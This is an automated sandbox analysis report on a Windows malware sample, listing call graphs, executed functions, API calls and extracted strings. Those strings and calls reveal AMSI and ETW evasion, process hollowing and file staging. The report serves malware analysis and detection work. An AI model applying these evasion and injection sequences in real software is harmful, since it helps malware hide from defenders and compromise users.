36397 28c58cc 12 API calls 36380->36397 36381->36380 36382 28c5af1 RegOpenKeyExA 36381->36382 36382->36380 36384 28c5b9c lstrcpynA GetThreadLocale GetLocaleInfoA 36382->36384 36386 28c5cb6 36384->36386 36387 28c5bd3 36384->36387 36385 28c5b38 RegQueryValueExA 36388 28c5b58 RegQueryValueExA 36385->36388 36389 28c5b76 RegCloseKey 36385->36389 36386->36377 36387->36386 36390 28c5be3 lstrlenA 36387->36390 36388->36389 36389->36377 36392 28c5bfb 36390->36392 36392->36386 36393 28c5c48 36392->36393 36394 28c5c20 lstrcpynA LoadLibraryExA 36392->36394 36393->36386 36395 28c5c52 lstrcpynA LoadLibraryExA 36393->36395 36394->36393 36395->36386 36396 28c5c84 lstrcpynA LoadLibraryExA 36395->36396 36396->36386 36397->36385 36398 28c4c60 36399 28c4c64 36398->36399 36400 28c4c87 36398->36400 36401 28c4c24 36399->36401 36404 28c4c77 SysReAllocStringLen 36399->36404 36402 28c4c38 36401->36402 36403 28c4c2a SysFreeString 36401->36403 36403->36402 36404->36400 36405 28c4bf4 36404->36405 36406 28c4c10 36405->36406 36407 28c4c00 SysAllocStringLen 36405->36407 36407->36405 36407->36406 36408 28e1ac0 36409 28c4824 11 API calls 36408->36409 36410 28e1ae1 36409->36410 36411 28e1aec 36410->36411 36412 28e1af9 36411->36412 36413 28c47b0 11 API calls 36412->36413 36414 28e1b18 36413->36414 36415 28c4964 36414->36415 36416 28e1b23 36415->36416 36417 28c4698 36416->36417 36418 28e1b30 36417->36418 36419 28d7be8 17 API calls 36418->36419 36420 28e1b3c 36419->36420 36421 28c4824 11 API calls 36420->36421 36422 28e1b5d 36421->36422 36423 28e1b68 36422->36423 36424 28c47b0 11 API calls 36423->36424 36425 28e1b94 36424->36425 36426 28c4964 36425->36426 36427 28e1b9f 36426->36427 36428 28c4698 36427->36428 36429 28e1bac 36428->36429 36430 28d7be8 17 API calls 36429->36430 36431 28e1bb8 36430->36431 36432 28c4824 11 API calls 36431->36432 36433 28e1c37 36432->36433 36434 28c4964 36433->36434 36435 28e1c42 36434->36435 36436 28e1c4e 36435->36436 36437 28c4824 11 API calls 36436->36437 36438 28e1c6f 36437->36438 36439 28c4964 36438->36439 36440 28e1c7a 36439->36440 36441 28c4698 36440->36441 36442 28e1c87 36441->36442 36443 28c47b0 11 API calls 36442->36443 36444 28e1ca6 36443->36444 36445 28c4964 36444->36445 36446 28e1cb1 36445->36446 36447 28d7be8 17 API calls 36446->36447 36448 28e1cca 36447->36448 36449 28c4824 11 API calls 36448->36449 36450 28e1ceb 36449->36450 36451 28c4698 36450->36451 36452 28e1d03 36451->36452 36453 28c47b0 11 API calls 36452->36453 36454 28e1d22 36453->36454 36455 28e1d3a 36454->36455 36456 28d7be8 17 API calls 36455->36456 36457 28e1d46 36456->36457 36458 28c4824 11 API calls 36457->36458 36459 28e1d67 36458->36459 36460 28e1d72 36459->36460 36461 28c4698 36460->36461 36462 28e1d7f 36461->36462 36463 28c47b0 11 API calls 36462->36463 36464 28e1d9e 36463->36464 36465 28c4964 36464->36465 36466 28e1da9 36465->36466 36467 28c4698 36466->36467 36468 28e1db6 36467->36468 36469 28d7be8 17 API calls 36468->36469 36470 28e1dc2 36469->36470 36471 28e1dd3 36470->36471 36472 28e1deb 36471->36472 37845 28c4728 36472->37845 37846 28c472e 37845->37846

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 028DD5D0 Relevance: 218.7, APIs: 9, Strings: 111, Instructions: 8669COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • InetIsOffline.URL(00000000,00000000,028E8FB6,?,?,?,00000000,00000000), ref: 028DD604
                                                                                                                                                                      • Part of subcall function 028D7BE8: LoadLibraryW.KERNEL32(?,00000000,028D7C9A), ref: 028D7C18
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028D7C9A), ref: 028D7C1E
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028D7C37
                                                                                                                                                                      • Part of subcall function 028C7E18: GetFileAttributesA.KERNEL32(00000000,?,028DE0EE,ScanString,02924344,028E8FEC,OpenSession,02924344,028E8FEC,ScanString,02924344,028E8FEC,UacScan,02924344,028E8FEC,UacInitialize), ref: 028C7E23
                                                                                                                                                                      • Part of subcall function 028CC320: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029245F0,?,028DE40F,ScanBuffer,02924344,028E8FEC,OpenSession,02924344,028E8FEC,ScanBuffer,02924344,028E8FEC,OpenSession), ref: 028CC337
                                                                                                                                                                      • Part of subcall function 028DC4DC: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028DC5AC), ref: 028DC517
                                                                                                                                                                      • Part of subcall function 028DC4DC: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,028DC5AC), ref: 028DC547
                                                                                                                                                                      • Part of subcall function 028DC4DC: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 028DC55C
                                                                                                                                                                      • Part of subcall function 028DC4DC: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 028DC588
                                                                                                                                                                      • Part of subcall function 028DC4DC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 028DC591
                                                                                                                                                                      • Part of subcall function 028C7E3C: GetFileAttributesA.KERNEL32(00000000,?,028E1133,ScanString,02924344,028E8FEC,OpenSession,02924344,028E8FEC,OpenSession,02924344,028E8FEC,ScanBuffer,02924344,028E8FEC,ScanString), ref: 028C7E47
                                                                                                                                                                      • Part of subcall function 028C8004: CreateDirectoryA.KERNEL32(00000000,00000000,?,028E1324,ScanBuffer,02924344,028E8FEC,OpenSession,02924344,028E8FEC,Initialize,02924344,028E8FEC,ScanString,02924344,028E8FEC), ref: 028C8011
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$AttributesModuleNamePath$AddressCloseCreateDirectoryHandleInetInformationLibraryLoadName_OfflineOpenProcQueryRead
                                                                                                                                                                    • String ID: .url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$bcrypt$can$endpointdlp$http$ieproxy$iexpress.exe$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                                                                    • API String ID: 2725267379-582383607
                                                                                                                                                                    • Opcode ID: c3dff70113703e84c8868c617e5d6c13f0c0e2c0cf1bbbeddeb5d4b06be40a06
                                                                                                                                                                    • Instruction ID: 961f426cb3c95cf57e504b04b2da44ebb027b19c6c2a38344f7b58d298def372
                                                                                                                                                                    • Opcode Fuzzy Hash: c3dff70113703e84c8868c617e5d6c13f0c0e2c0cf1bbbeddeb5d4b06be40a06
                                                                                                                                                                    • Instruction Fuzzy Hash: C804EA3CA141689FDF60EB68D890EDD73B6AF95301F2044A9A109E7714DB70EE89CF52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028E5FA0 Relevance: 142.4, APIs: 3, Strings: 77, Instructions: 2445COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 4522 28e5fa0-28e618a call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 4577 28e6190-28e638f call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c48b0 4522->4577 4578 28e618b call 28d7be8 4522->4578 4637 28e6b54-28e6cd7 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c48b0 4577->4637 4638 28e6395-28e69b4 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c2ee0 call 28c2f08 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 GetCurrentProcess call 28d7968 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 4577->4638 4578->4577 4727 28e6cdd-28e6cec call 28c48b0 4637->4727 4728 28e74a8-28e8b96 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 * 16 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 ExitProcess 4637->4728 5164 28e69bb-28e6b4f call 28c49bc call 28dc5bc call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 EnumSystemLocalesA 4638->5164 5165 28e69b6-28e69b9 4638->5165 4727->4728 4737 28e6cf2-28e6fc5 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28dd198 call 28c4824 call 28c4964 call 28c4698 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c7e18 4727->4737 4981 28e6fcb-28e729d call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28dc74c call 28c44f4 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4da4 * 2 call 28c4728 call 28dc3f8 4737->4981 4982 28e72a2-28e74a3 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c49bc call 28d7f48 4737->4982 4981->4982 4982->4728 5164->4637 5165->5164
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 028D7BE8: LoadLibraryW.KERNEL32(?,00000000,028D7C9A), ref: 028D7C18
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028D7C9A), ref: 028D7C1E
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028D7C37
                                                                                                                                                                      • Part of subcall function 028C2EE0: QueryPerformanceCounter.KERNEL32 ref: 028C2EE4
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00001000,00000040,ScanBuffer,02924344,028E8FEC,OpenSession,02924344,028E8FEC,UacScan,02924344,028E8FEC,ScanBuffer,02924344,028E8FEC), ref: 028E681D
                                                                                                                                                                      • Part of subcall function 028D7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028D7975
                                                                                                                                                                      • Part of subcall function 028D7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028D797B
                                                                                                                                                                      • Part of subcall function 028D7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028D799B
                                                                                                                                                                    • EnumSystemLocalesA.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,00000000,ScanBuffer,02924344,028E8FEC,OpenSession,02924344,028E8FEC,UacScan,02924344,028E8FEC,ScanBuffer,02924344,028E8FEC,OpenSession,02924344), ref: 028E6B4F
                                                                                                                                                                      • Part of subcall function 028C7E18: GetFileAttributesA.KERNEL32(00000000,?,028DE0EE,ScanString,02924344,028E8FEC,OpenSession,02924344,028E8FEC,ScanString,02924344,028E8FEC,UacScan,02924344,028E8FEC,UacInitialize), ref: 028C7E23
                                                                                                                                                                      • Part of subcall function 028DC3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028DC4CA), ref: 028DC437
                                                                                                                                                                      • Part of subcall function 028DC3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 028DC471
                                                                                                                                                                      • Part of subcall function 028DC3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 028DC49E
                                                                                                                                                                      • Part of subcall function 028DC3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 028DC4A7
                                                                                                                                                                    • ExitProcess.KERNEL32(00000000,ScanBuffer,02924344,028E8FEC,OpenSession,02924344,028E8FEC,Initialize,02924344,028E8FEC,ScanString,02924344,028E8FEC,OpenSession,02924344,028E8FEC), ref: 028E8B96
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$AddressHandleModulePathProcProcess$AllocateAttributesCloseCounterCreateCurrentEnumExitLibraryLoadLocalesMemoryNameName_PerformanceQuerySystemVirtualWrite
                                                                                                                                                                    • String ID: Advapi$BCryptVerifySignature$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$bcrypt$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                                                    • API String ID: 724724934-2845693168
                                                                                                                                                                    • Opcode ID: ef76beca8ca53d49041f824b061c20cdab2dae3797c39627b1efda3c2841cbd2
                                                                                                                                                                    • Instruction ID: 941fa8f4276cd15e88643985d115528f539bc3822492b4ae7f017f7a0891da57
                                                                                                                                                                    • Opcode Fuzzy Hash: ef76beca8ca53d49041f824b061c20cdab2dae3797c39627b1efda3c2841cbd2
                                                                                                                                                                    • Instruction Fuzzy Hash: 0B33EA3CA141689FDF60EB68D890CDE73B6AB95301F6044E9E109E7714DB70EE898F52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028D7F48 Relevance: 43.6, APIs: 8, Strings: 16, Instructions: 1602nativethreadprocessCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 8865 28d7f48-28d7f4b 8866 28d7f50-28d7f55 8865->8866 8866->8866 8867 28d7f57-28d803e call 28c4954 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 8866->8867 8898 28d99ab-28d9a15 call 28c44c4 * 2 call 28c4c24 call 28c44c4 call 28c44a0 call 28c44c4 * 2 8867->8898 8899 28d8044-28d811f call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 8867->8899 8899->8898 8943 28d8125-28d844d call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c3098 * 2 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4da4 call 28c4db4 CreateProcessAsUserW 8899->8943 9050 28d844f-28d84bb call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 8943->9050 9051 28d84c0-28d87e6 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c2ee0 call 28c2f08 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 GetThreadContext 8943->9051 9050->9051 9051->8898 9159 28d87ec-28d8a4f call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 NtReadVirtualMemory 9051->9159 9230 28d8d5c-28d8dc8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 9159->9230 9231 28d8a55-28d8bbe call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 NtUnmapViewOfSection 9159->9231 9258 28d8dcd-28d8f4d call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28d7968 9230->9258 9317 28d8be8-28d8c54 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 9231->9317 9318 